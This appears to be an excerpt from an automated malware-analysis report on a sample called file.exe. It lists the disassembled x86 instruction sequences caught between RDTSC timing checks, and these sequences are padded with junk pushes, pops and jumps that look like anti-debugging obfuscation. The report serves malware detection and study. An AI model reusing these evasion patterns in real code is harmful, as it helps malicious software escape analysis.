Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C701E9 second address: 4C701EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C701EF second address: 4C701F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C701F3 second address: 4C7028A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F2E050A57D5h 0x00000013 jmp 00007F2E050A57CBh 0x00000018 popfd 0x00000019 call 00007F2E050A57D8h 0x0000001e pop eax 0x0000001f popad 0x00000020 pushfd 0x00000021 jmp 00007F2E050A57CBh 0x00000026 sbb ch, 0000002Eh 0x00000029 jmp 00007F2E050A57D9h 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, esi 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F2E050A57CCh 0x00000038 or ax, DBA8h 0x0000003d jmp 00007F2E050A57CBh 0x00000042 popfd 0x00000043 push eax 0x00000044 push edx 0x00000045 push ecx 0x00000046 pop ebx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7028A second address: 4C7028E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7028E second address: 4C70303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 call 00007F2E050A57D7h 0x0000000e mov eax, 785E0C7Fh 0x00000013 pop esi 0x00000014 pushfd 0x00000015 jmp 00007F2E050A57D5h 0x0000001a sub esi, 6432C126h 0x00000020 jmp 00007F2E050A57D1h 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, esi 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b pushfd 0x0000002c jmp 00007F2E050A57CAh 0x00000031 or cx, 42C8h 0x00000036 jmp 00007F2E050A57CBh 0x0000003b popfd 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70303 second address: 4C70334 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 2EB3D03Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, 181F315Bh 0x0000000e popad 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007F2E044F25FAh 0x0000001b or cx, C528h 0x00000020 jmp 00007F2E044F25FBh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70334 second address: 4C7033E instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7033E second address: 4C703C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push esi 0x00000007 jmp 00007F2E044F25FAh 0x0000000c mov dword ptr [esp], edi 0x0000000f jmp 00007F2E044F2600h 0x00000014 test esi, esi 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F2E044F25FEh 0x0000001d adc al, FFFFFFE8h 0x00000020 jmp 00007F2E044F25FBh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F2E044F2608h 0x0000002c adc ch, 00000048h 0x0000002f jmp 00007F2E044F25FBh 0x00000034 popfd 0x00000035 popad 0x00000036 je 00007F2E767B085Fh 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F2E044F2605h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C703C9 second address: 4C70412 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 pushad 0x00000012 movzx ecx, bx 0x00000015 mov bl, C0h 0x00000017 popad 0x00000018 mov ch, E2h 0x0000001a popad 0x0000001b je 00007F2E77363A01h 0x00000021 jmp 00007F2E050A57D3h 0x00000026 mov edx, dword ptr [esi+44h] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70412 second address: 4C70416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70416 second address: 4C7041C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7041C second address: 4C70496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d push ecx 0x0000000e push edx 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 pushfd 0x00000012 jmp 00007F2E044F2606h 0x00000017 add si, 00F8h 0x0000001c jmp 00007F2E044F25FBh 0x00000021 popfd 0x00000022 popad 0x00000023 test edx, 61000000h 0x00000029 jmp 00007F2E044F2606h 0x0000002e jne 00007F2E767B0807h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F2E044F2607h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70496 second address: 4C7049C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6080D second address: 4C60876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2E044F2607h 0x00000009 sbb si, 516Eh 0x0000000e jmp 00007F2E044F2609h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov di, ax 0x0000001c call 00007F2E044F2604h 0x00000021 mov ah, 72h 0x00000023 pop ebx 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 mov esi, 4F34DC65h 0x0000002c popad 0x0000002d xchg eax, ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60876 second address: 4C6087A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6087A second address: 4C60897 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60897 second address: 4C6089D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6089D second address: 4C608B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop edi 0x0000000f movzx eax, dx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C608B0 second address: 4C60915 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d mov cx, 9F4Dh 0x00000011 pushfd 0x00000012 jmp 00007F2E050A57CAh 0x00000017 add ch, 00000068h 0x0000001a jmp 00007F2E050A57CBh 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushfd 0x00000026 jmp 00007F2E050A57D2h 0x0000002b and cx, 50C8h 0x00000030 jmp 00007F2E050A57CBh 0x00000035 popfd 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60A84 second address: 4C60A88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60A88 second address: 4C60A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60A8E second address: 4C60B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 push ebx 0x00000011 mov bx, cx 0x00000014 pop esi 0x00000015 popad 0x00000016 mov ebx, 00000000h 0x0000001b jmp 00007F2E044F25FEh 0x00000020 test esi, esi 0x00000022 jmp 00007F2E044F2600h 0x00000027 je 00007F2E767B7EB2h 0x0000002d jmp 00007F2E044F2600h 0x00000032 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000039 pushad 0x0000003a jmp 00007F2E044F25FEh 0x0000003f mov cx, 8AC1h 0x00000043 popad 0x00000044 mov ecx, esi 0x00000046 jmp 00007F2E044F25FCh 0x0000004b je 00007F2E767B7E88h 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F2E044F2607h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60B30 second address: 4C60B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60B36 second address: 4C60B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60B3A second address: 4C60B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60B3E second address: 4C60BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [76FB6968h], 00000002h 0x0000000f jmp 00007F2E044F2607h 0x00000014 jne 00007F2E767B7E48h 0x0000001a jmp 00007F2E044F2606h 0x0000001f mov edx, dword ptr [ebp+0Ch] 0x00000022 jmp 00007F2E044F2600h 0x00000027 xchg eax, ebx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F2E044F25FEh 0x0000002f sbb ecx, 533F7928h 0x00000035 jmp 00007F2E044F25FBh 0x0000003a popfd 0x0000003b popad 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F2E044F25FEh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60BCA second address: 4C60BD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60BD0 second address: 4C60BE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, D4A3h 0x00000007 mov di, si 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60BE4 second address: 4C60BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60BE8 second address: 4C60BEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60BEE second address: 4C60C63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2E050A57D4h 0x00000009 sub ecx, 0D0D4118h 0x0000000f jmp 00007F2E050A57CBh 0x00000014 popfd 0x00000015 mov cx, A0CFh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebx 0x0000001d jmp 00007F2E050A57D2h 0x00000022 push eax 0x00000023 jmp 00007F2E050A57CBh 0x00000028 xchg eax, ebx 0x00000029 pushad 0x0000002a jmp 00007F2E050A57D4h 0x0000002f movzx esi, di 0x00000032 popad 0x00000033 push dword ptr [ebp+14h] 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov dl, ah 0x0000003b push edi 0x0000003c pop eax 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60CD3 second address: 4C60D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov esp, ebp 0x00000008 pushad 0x00000009 mov bx, ax 0x0000000c popad 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F2E044F25FFh 0x00000017 jmp 00007F2E044F2603h 0x0000001c popfd 0x0000001d call 00007F2E044F2608h 0x00000022 pop esi 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70D44 second address: 4C70D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70D48 second address: 4C70D4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70D4E second address: 4C70D6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70D6E second address: 4C70D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70D73 second address: 4C70D96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov al, 98h 0x0000000f mov bx, 3ABCh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70D96 second address: 4C70DBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 mov eax, 17913C43h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2E044F2605h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70B43 second address: 4C70B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70B4A second address: 4C70B68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F2E044F25FEh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70B68 second address: 4C70B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70B6C second address: 4C70B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70B70 second address: 4C70B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70B76 second address: 4C70B93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2604h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70B93 second address: 4C70BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, 3E357BB9h 0x00000009 popad 0x0000000a mov bx, si 0x0000000d popad 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 call 00007F2E050A57CEh 0x00000016 pushfd 0x00000017 jmp 00007F2E050A57D2h 0x0000001c jmp 00007F2E050A57D5h 0x00000021 popfd 0x00000022 pop ecx 0x00000023 mov edx, 6F0820D4h 0x00000028 popad 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F2E050A57D6h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CF06F0 second address: 4CF0707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E044F2603h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CF0707 second address: 4CF070B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CF070B second address: 4CF071A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CF071A second address: 4CF071E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CF071E second address: 4CF0722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CF0722 second address: 4CF0728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CF0728 second address: 4CF072E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CF072E second address: 4CF0732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CF0732 second address: 4CF0744 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ebx, 6AA274EEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE09A3 second address: 4CE09A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE09A7 second address: 4CE09AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE084C second address: 4CE0851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0851 second address: 4CE086C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E044F2607h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C800F6 second address: 4C8011C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8011C second address: 4C80137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 jmp 00007F2E044F25FCh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80137 second address: 4C8019B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2E050A57CAh 0x00000008 sbb cx, FD48h 0x0000000d jmp 00007F2E050A57CBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F2E050A57D8h 0x0000001b or si, BFA8h 0x00000020 jmp 00007F2E050A57CBh 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F2E050A57D5h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8019B second address: 4C801AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E044F25FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C801AB second address: 4C801AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C801AF second address: 4C801F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F2E044F25FDh 0x00000010 and esi, 772D4526h 0x00000016 jmp 00007F2E044F2601h 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e call 00007F2E044F25FEh 0x00000023 pop ecx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0B10 second address: 4CE0B1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0B1F second address: 4CE0BEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 pushfd 0x00000006 jmp 00007F2E044F25FBh 0x0000000b and al, 0000002Eh 0x0000000e jmp 00007F2E044F2609h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov ecx, 4AD76553h 0x0000001e mov dx, cx 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007F2E044F2605h 0x00000028 xchg eax, ebp 0x00000029 jmp 00007F2E044F25FEh 0x0000002e mov ebp, esp 0x00000030 pushad 0x00000031 call 00007F2E044F25FEh 0x00000036 mov eax, 3448B111h 0x0000003b pop eax 0x0000003c pushfd 0x0000003d jmp 00007F2E044F2607h 0x00000042 sbb eax, 275742FEh 0x00000048 jmp 00007F2E044F2609h 0x0000004d popfd 0x0000004e popad 0x0000004f push dword ptr [ebp+0Ch] 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F2E044F2608h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0BEF second address: 4CE0BFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0BFE second address: 4CE0C04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0C04 second address: 4CE0C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0C08 second address: 4CE0C3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b jmp 00007F2E044F2607h 0x00000010 call 00007F2E044F25F9h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a mov dh, F6h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0C3B second address: 4CE0CBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F2E050A57D9h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F2E050A57D1h 0x0000000f and eax, 227FC406h 0x00000015 jmp 00007F2E050A57D1h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f pushad 0x00000020 movsx ebx, cx 0x00000023 pushad 0x00000024 jmp 00007F2E050A57D6h 0x00000029 mov ch, DDh 0x0000002b popad 0x0000002c popad 0x0000002d mov eax, dword ptr [esp+04h] 0x00000031 jmp 00007F2E050A57CCh 0x00000036 mov eax, dword ptr [eax] 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0CBC second address: 4CE0CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F2E044F25FAh 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0D36 second address: 4CE0D53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
